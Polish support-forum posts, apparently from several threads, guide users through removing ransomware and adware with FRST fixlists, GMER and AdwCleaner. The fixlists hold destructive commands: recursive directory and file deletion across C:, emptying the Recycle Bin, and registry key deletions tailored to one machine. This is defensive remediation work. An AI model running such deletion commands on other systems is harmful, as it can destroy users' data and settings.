Smart Network.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk C:\ProgramData\Sony Corporation\VAIO Partners\yandex.url C:\Users\Jarek\AppData\Local\avgchrome C:\Users\Jarek\AppData\Local\Comodo C:\Users\Jarek\AppData\Local\CrashDumps C:\Users\Jarek\AppData\Local\DM C:\Users\Jarek\AppData\Local\enchant C:\Users\Jarek\AppData\Local\Evernote C:\Users\Jarek\AppData\Local\javasharedresources C:\Users\Jarek\AppData\Local\TrafficSpaceLLC C:\Users\Jarek\AppData\LocalLow\Evernote C:\Users\Jarek\AppData\LocalLow\Sun C:\Users\Jarek\AppData\LocalLow\Temp C:\Users\Jarek\AppData\Roaming\appdataFr3.bin C:\Users\Jarek\AppData\Roaming\AnySend C:\Users\Jarek\AppData\Roaming\EditPlus 3 C:\Users\Jarek\AppData\Roaming\FreeFLVConverter C:\Users\Jarek\AppData\Roaming\HD Tune Pro C:\Users\Jarek\AppData\Roaming\iolo C:\Users\Jarek\AppData\Roaming\Mozilla C:\Users\Jarek\AppData\Roaming\Systweak C:\Users\Jarek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\FLV Player.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Viber.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\SendTo\AnySend.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FLV Player C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sonoris\DDP_Player\License_Agreement.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sonoris\DDP_Player\Sonoris_DDP_Player.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Word\graal%202304248003248754775\graal%202.docx.lnk C:\Users\Jarek\Desktop\kraków delegacja.lnk C:\Users\Jarek\Desktop\michael marcus (1).lnk C:\Users\Jarek\Desktop\Nowy folder\*.lnk C:\Users\Jarek\Downloads\!Decrypt-All-Files-ipeqgvm.bmp C:\Users\Jarek\Downloads\!Decrypt-All-Files-ipeqgvm.txt C:\Users\Jarek\Downloads\CCleaner 5.02.5101.exe C:\Users\Jarek\Downloads\Download*.exe C:\Users\Jarek\Downloads\Java*.exe C:\Users\Jarek\Downloads\Renata%20Zar%3Fbska%20-%20Noc%20z%20Renat%3F.mp3.exe C:\Windows\system32\drivers\avgtpx64.sys Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1 /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\GamesAppService" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Hoolapp Android" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Smart File Advisor" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Tiny download manager" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Viber" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f CMD: for /d %f in (C:\ProgramData\Microsoft\Windows\GameExplorer\{*}) do rd /s /q "%f" CMD: for /d %f in (C:\Users\Jarek\AppData\Local\{*}) do rd /s /q "%f" CMD: for /d %f in (C:\Users\Jarek\AppData\LocalLow\{*}) do rd /s /q "%f" Reg: reg load HKLM\TEMP C:\FRST\Hives\SYSTEM Reg: reg export HKLM\TEMP\CurrentControlSet\Services\DCService.exe C:\Users\Jarek\Desktop\DCService.reg Reg: reg export HKLM\TEMP\CurrentControlSet\Services\TVICHW32 C:\Users\Jarek\Desktop\TVICHW32.reg Reg: reg export "HKLM\TEMP\CurrentControlSet\Services\UI Assistant Service" C:\Users\Jarek\Desktop\UIAssistant.reg Reg: reg unload HKLM\TEMP Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. 3. Na Pulpicie powinny powstać trzy pliki REG: DCService.reg, TVICHW32.reg, UIAssistant.reg. Otwórz każdy w Notatniku i zamień: HKEY_LOCAL_MACHINE\TEMP ... na: HKEY_LOCAL_MACHINE\SYSTEM Po korekcie pliki zaimportuj do rejestru. 4. Uruchom FRST, w polu Search wklej: *ipeqgvm* Klik w Search files i przedstaw wynikowy log. Log będzie gruby. Gdyby się nie zmieścił w załączniku, shostuj na innym serwisie i podaj link.

Akcja pomyślnie wykonana i nie ma już śladów by infekcja była aktywna. 1. Rekursywne usuwanie zaszyfrowanych plików. Na Pulpicie utworzyłeś folder Zaszyfrowane - nie wiem w jakim celu, ale jeśli jest w jakiś sposób potrzebny (eksperymenty), to go przesuń na inny dysk, bo skrypt FRST wykosi wszystkie pliki z suffiksami. Otwórz Notatnik i wklej w nim: DeleteQuarantine: CMD: rd /s /q C:\$Recycle.Bin CMD: del /q /s C:\*pogkqql* Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Może długo się wykonywać. Pokaż wynikowy fixlog.txt. 2. Jeśli chodzi o tapetę: Pokaż mi na zrzucie ekranu jak wygląda to "odliczanie". Poza tym, log Addition konsekwentnie notuje rozbieżność, a kopia tapety wg wyników Search jest zaszyfrowana: C:\Users\User\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.JPG.pogkqql [2014-08-22 20:19][2014-08-22 20:20] 0635824 ____A () 6A541AB4FAC829F4C889BA71AD29C75C Po zrobieniu zrzutu ekranu jeszcze raz zresetuj ustawienia Tła Pulpitu, poprzednio akcja była robiona podczas czynnego procesu hglomif.exe. Jako obraz wybierz coś co na 100% nie jest zaszyfrowanym plikiem graficznym. Zresetuj system i dostarcz nowy log Addition.

To skomentowałam w poprzednim temacie, który zamknę. Wygląda na to, że BitDefender wpływał na tę usterkę. To proxy nie było czynne, więc prędzej Bidefender. Pytałam tylko czy jest używane przed zadaniem kolejnego Fixa do FRST usuwającego te wtręty. Na wszelki wypadek zrób jeszcze nowy log FRST (bez Addition i Shortcut). Problem z "lekkością" polega na tym, że obecnie antywirusy z pełną pulą opcji są oparte na rozbudowanych układach usług / sterowników. Trudno doprawdy przewidzieć co się stanie na danej konfiguracji, dopóki dany program nie zostanie namacalnie sprawdzony.

MBAM znalazł drobnostki, wszystko do wyrzucenia. Co z ostatnim Fixem FRST - kwarantanna nadal oporna? W której przeglądarce i jaki rodzaj problemu (jakiś błąd, brak detekcji Java)?

Zdefiniuj o którym svchost.exe mowa. W menedżerze zadań prawoklik na to wystąpienie > Przejdź do usług > Wpisz jakie się podświetliły. Jeszcze drobne poprawki w spoilerze: Należy jednak zwrócić uwagę, że te Fixy FRST nie są powiązane z problemem zasadniczym. To tylko "kosmetyka" i nic poza tym.

Tak, GMER (zrobiony później niż FRST) wykazuje, że ten proces nadal aktywnie działa w tle jako ukryty. Dzieje się tak dlatego, gdyż proces startuje poprzez Harmonogram zadań: ---- Processes - GMER 2.1 ---- Process C:\Users\User\AppData\Local\Temp\hglomif.exe (*** suspicious ***) @ C:\Users\User\AppData\Local\Temp\hglomif.exe [2220](2015-02-04 17:05:10) 0000000000400000 ==================== Scheduled Tasks (whitelisted) ============= Task: {A6CC8B56-B41C-4228-96A1-10D34946E422} - System32\Tasks\juixzej => C:\Users\User\AppData\Local\Temp\hglomif.exe [2015-02-04] () Tapeta na pewno się utrzymała? FRST wysyła sprzeczny komunikat. Niby tapeta przywrócona, a równocześnie komunikat o braku tej wartości: ==================== Other Registry Areas ===================== HKU\S-1-5-21-3639878282-2317462388-1843896377-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg ATTENTION: Missing Desktop Wallpaper Registry entry. Zostały też do wyrzucenia pliki pomocnicze infekcji oraz zaszyfrowane pliki z dysku C (te w folderach aplikacji można wyrzucić). [hr] Wstępna akcja: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {A6CC8B56-B41C-4228-96A1-10D34946E422} - System32\Tasks\juixzej => C:\Users\User\AppData\Local\Temp\hglomif.exe [2015-02-04] () C:\ProgramData\oiukxod.html C:\Users\User\Documents\!Decrypt-All-Files-pogkqql.bmp C:\Users\User\Documents\!Decrypt-All-Files-pogkqql.txt Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f CMD: sc config "PLAY ONLINE. RunOuc" start= disabled EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. 3. Uruchom FRST ponownie, w polu Search wklej: *pogkqql*;*decrypt* Klik w Search Files i dostarcz wynikowy log. Może być ogromny. Jeśli nie wejdzie w załącznik, to spakuj do ZIP i shostuj gdzieś podając link.

luq92 Proszę pokaż nowe raporty FRST po deinstalacji COMODO (włącznie z Addition). Poprzednio w Addition był notowany błąd dostępu do WMI (przypuszczalnie blokada folderu C:\Windows\System32\LogFiles\WMI\RtBackup): ==================== Restore Points ========================= Could not list restore points. Check "winmgmt" service or repair WMI. ==================== Faulty Device Manager Devices ============= Could not list Devices. Check "winmgmt" service or repair WMI. ==================== Event log errors: ========================= Could not start eventlog service, could not read events. Wystąpił błąd systemu 123. Nazwa pliku, nazwa katalogu lub składnia etykiety woluminu jest niepoprawna. To mogą lecz nie muszą być błędy prowokowane przez COMODO. Zappa $CmdZnID to strumienie COMODO. Przed jakimkolwiek Fix wypada sprawdzić stan po deinstalacji programu, czy ADS zostało usunięte przez instalator programu. Dane z pierwszych raportów FRST mogą być nieaktualne.

Skasuj plik C:\Delfix.txt z dysku. To wszystko. Temat zamykam.

1. Jeśli chodzi o niemożność usunięcia kwarantanny, to wejdź w Tryb awaryjny i zapuść ponownie fixlist.txt o postaci: CloseProcesses: RemoveDirectory: C:\FRST\Quarantine 2. Jeśli chodzi o instalator MBAM, to czy przypadkiem nie blokuje akcji po prostu McAfee?

Odpowiadam tutaj cytując wątek z alternatywnego tematu: Nie, to nie ma nic wspólnego. To było tylko pobieranie danych w trybie "tylko do odczytu", żadnych manipulacji / modyfikacji. A pobrana lista wpisów "Credential Providers" w stanie domyślnym, identyczne wpisy u mnie. Jeśli nagle po działaniach z poprzedniego tematu ustąpił efekt, to wygląda na to, że problemem była instalacja BitDefender, bo to jedyny obiekt który się aktywnie zazębiał z ekranem logowania. Fix FRST nic nie grzebał w tych obszarach.

Czy był jakiś problem z deinstalacjami, tzn. czy któreś z wejść było np. niewidoczne? A Fix wykonany pomyślnie. Kolejne poprawki: 1. Pobrany YAC (Yet Another Cleaner) usuń ręcznie, bo jest poza zakresem czasowym raportów. 2. Uruchom AdwCleaner. Na razie wybierz tylko opcję Szukaj (jeszcze nie używaj Usuń) i dostarcz log wynikowy z folderu C:\AdwCleaner.

Fix jest jednorazowy i nie wolno go powtarzać. Akcja była bez sensu. Podany Fixlog nie jest właściwym, pokazuje już to drugie wadliwe podejście (brak wykonanych operacji). Ale zostaw to już. Pierwsze podejście usunęło co należy. Poprawki: AKCJE Z POZIOMU KONTA Administracja: 1. W Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres istart.webssearches.com, przestaw na "Otwórz stronę nowej karty". 2. Otwórz Notatnik i wklej w nim: HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe" HKU\S-1-5-21-1031725685-881205413-3405888468-1001\...\Run: [Akamai NetSession Interface] => "C:\Users\Administracja\AppData\Local\Akamai\netsession_win.exe" BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll No File Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. 3. Uruchom AdwCleaner. Na razie wybierz tylko Szukaj (nie stosuj jeszcze Usuń) i dostarcz wynikowy log z folderu C:\AdwCleaner.